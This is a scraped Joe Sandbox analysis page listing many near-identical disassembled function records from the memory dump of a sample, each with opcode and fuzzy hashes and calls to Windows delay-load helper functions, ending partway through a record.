API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d7e4915a331223a50464fd32ad208596003105f47f389f19c89ff26c61725beb
Instruction ID: e82a56d1ec6e1ad59081e829a1031198d3606c1320845f2ae09cd6f086fd2e80
Opcode Fuzzy Hash: d7e4915a331223a50464fd32ad208596003105f47f389f19c89ff26c61725beb
Instruction Fuzzy Hash: 76B012A667D2027C310B71147C06D37035DC8C2B10330805BF10AD41C1D4405C041631

Function 0038D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7eb3c3019ecc56b1e664f19b43bca23135df2477e989c09b618368cdea1b7262
Instruction ID: 398ef209767145f4b950032cc64642e7188335f8cb55a54b3fc35de7d37dd350
Opcode Fuzzy Hash: 7eb3c3019ecc56b1e664f19b43bca23135df2477e989c09b618368cdea1b7262
Instruction Fuzzy Hash: 74B012B666D3017C314B72547C06D37031DC4C2B10330815BF10AD41C1D4405C441631

Function 0038D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 85c2ea72ec65ba0dbd9c981953962a8971a7363948e266a070e2503374d977d2
Instruction ID: 8d1e7cf6cb4abbe5375db4954fafdf43e11c31191e86c11ec157ef5dc980da4a
Opcode Fuzzy Hash: 85c2ea72ec65ba0dbd9c981953962a8971a7363948e266a070e2503374d977d2
Instruction Fuzzy Hash: 47B012A666D2017C310B71147C06D37031DC4C3B10330C05BF50AD41C1D4405C041631

Function 0038D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 56de4bde2c724a1801f3d218e272d0a1d6d2f2b453adb849eb1d0fd31fa8ba88
Instruction ID: 92f3e7521572182726319c5882c7aee7223f7a95e759dfab58751d0b9a1cc2b1
Opcode Fuzzy Hash: 56de4bde2c724a1801f3d218e272d0a1d6d2f2b453adb849eb1d0fd31fa8ba88
Instruction Fuzzy Hash: 7DB012A626C2017C310F71147D07D37039CC8C3B10330805BF10AD41C1D4405D051631

Function 0038DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 002acee7f2fe97a7e45add26290fb91e402b77f9642ea4476a80490319b9f382
Instruction ID: 3320611e15fa9bbdfbdfde9507c78575ab5182706a66e1b8e98122b24879a73b
Opcode Fuzzy Hash: 002acee7f2fe97a7e45add26290fb91e402b77f9642ea4476a80490319b9f382
Instruction Fuzzy Hash: 9AB012D626C2016C310F72067C02E3F035CC0C4B10330C55BF109C41C9D4444C095631

Function 0038DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dff409ac86be3c5c3ce1abd02e1cc9b2f3d324c2cba0edebc73a49743459f077
Instruction ID: 4c42fe733f1b384ff490688e294e82296c427b036f2f5917d33d42b8e504afe1
Opcode Fuzzy Hash: dff409ac86be3c5c3ce1abd02e1cc9b2f3d324c2cba0edebc73a49743459f077
Instruction Fuzzy Hash: 58B012A626C201AC320F72167C02D3B035CC0C0B10330C15BF409C41C5D4484C055631

Function 0038DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b9695d89143174cefddcd6fe78bf5f8dec5f4c5236b79be37002f578621b11bb
Instruction ID: 8cc275578a89d1aeeb4eaf85f00cf88af700f3f6bc4122905d805b118b5b84de
Opcode Fuzzy Hash: b9695d89143174cefddcd6fe78bf5f8dec5f4c5236b79be37002f578621b11bb
Instruction Fuzzy Hash: 7DB012962AC3016D710F72067C02E3B035CD0C1B11330815BF009C41C5D4444C045731

Function 0038DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9ae05b247df4a335c868fdacefa2c20d15d2e5ea019b8cad6f732cdf4ca6d259
Instruction ID: 2bf85facb80944928ee89240f8c5642397485ff041a1a1215a32f162ca555462
Opcode Fuzzy Hash: 9ae05b247df4a335c868fdacefa2c20d15d2e5ea019b8cad6f732cdf4ca6d259
Instruction Fuzzy Hash: 41B0129A36C2426C310F71043D07D77436CC0D4B10330805BF60AC41C1D9414C055231

Function 0038DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c7e2b412594a9b323c36ec01b6560e6b508166228b2b829c82f6b92b5e5786f1
Instruction ID: 779226c08ca3e8f355750521a75524bcb7723f8ccb4be0369e9c9c279b980a95
Opcode Fuzzy Hash: c7e2b412594a9b323c36ec01b6560e6b508166228b2b829c82f6b92b5e5786f1
Instruction Fuzzy Hash: 52B0129A36C202AC320F71043C07D77437CC0D0B10330805BF90AC51C1D9404C085231

Function 0038DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ce92df13b331a1e58e8bbb6abb0cf4cb4d953323a4bc05ceee07d6a7dac67e57
Instruction ID: 533668aeb6f99ff9156566109a763ba46b905394832067d21335b605b0c8eeed
Opcode Fuzzy Hash: ce92df13b331a1e58e8bbb6abb0cf4cb4d953323a4bc05ceee07d6a7dac67e57
Instruction Fuzzy Hash: EFB012DE36C2016C310B71153C07E77036CD0D0B10330806BF10BC45C1D9404C085231

Function 0038DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1f5f102b4a90a17be12f6fa478cf8eb5e858d2e13948eca25ae461ea9aa1ac33
Instruction ID: 31edf80ed88edb08a10ee141917cf05dc574c0c87ae3b5e367cfe3c0760f8c28
Opcode Fuzzy Hash: 1f5f102b4a90a17be12f6fa478cf8eb5e858d2e13948eca25ae461ea9aa1ac33
Instruction Fuzzy Hash: 9FB0129A37C3067C320B31003C07C77432CC0D0B10330416BF506D40C199404C485131

Function 0038DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DC36

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c2a068f9accad5500e15b243ff23f0e4e0d23822d8da4b6b58b192c275ac678d
Instruction ID: 9435d225a679e2214d665afd0473cbc2077b2cb4271a37c11fc7c2de081e3366
Opcode Fuzzy Hash: c2a068f9accad5500e15b243ff23f0e4e0d23822d8da4b6b58b192c275ac678d
Instruction Fuzzy Hash: 10B0129A26C301BC310F31107E12C77433CC1C0B11330865BF209E40D1A5805C446131

Function 0038DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DC36

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 827c5468deab0e4f42a5fa5a1ade5a3d0a93a8b201d010b34c5a96af6f769116
Instruction ID: 18daef08804f0b1ac9bd36ad94129fcad214aea2a618fead47436cde9ab989af
Opcode Fuzzy Hash: 827c5468deab0e4f42a5fa5a1ade5a3d0a93a8b201d010b34c5a96af6f769116
Instruction Fuzzy Hash: 32B0129A27C302AC310F71147C12D77037CC0C0B10330855BF20DD51D1E5805C045231

Function 0038DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DC36

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5b06939cfd582fb0cff1306025779d1244e89eb4778a22da057c9b76627bc62a
Instruction ID: 5b895b657de941b7bff5ed33a220c0761aea91776d3475932842d83701415388
Opcode Fuzzy Hash: 5b06939cfd582fb0cff1306025779d1244e89eb4778a22da057c9b76627bc62a
Instruction Fuzzy Hash: 2CB0129A26C301BC310F71147C12D77037CC0C5B10330C55BF60DD51D1E5805C045231

Function 0038D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ea43a05bc74f20928618751a796576bad203176ba77bdb538cbc14976b2b1953
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: ea43a05bc74f20928618751a796576bad203176ba77bdb538cbc14976b2b1953
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e81658f558560a55bacbaa7f6261bc959e0fc0673d4f1b9e19f484279239a14a
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: e81658f558560a55bacbaa7f6261bc959e0fc0673d4f1b9e19f484279239a14a
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 26bd720a4aaa7ca8a1dff42ad126e91381f44b3acab41a0af379a0d5f4fbe436
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: 26bd720a4aaa7ca8a1dff42ad126e91381f44b3acab41a0af379a0d5f4fbe436
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
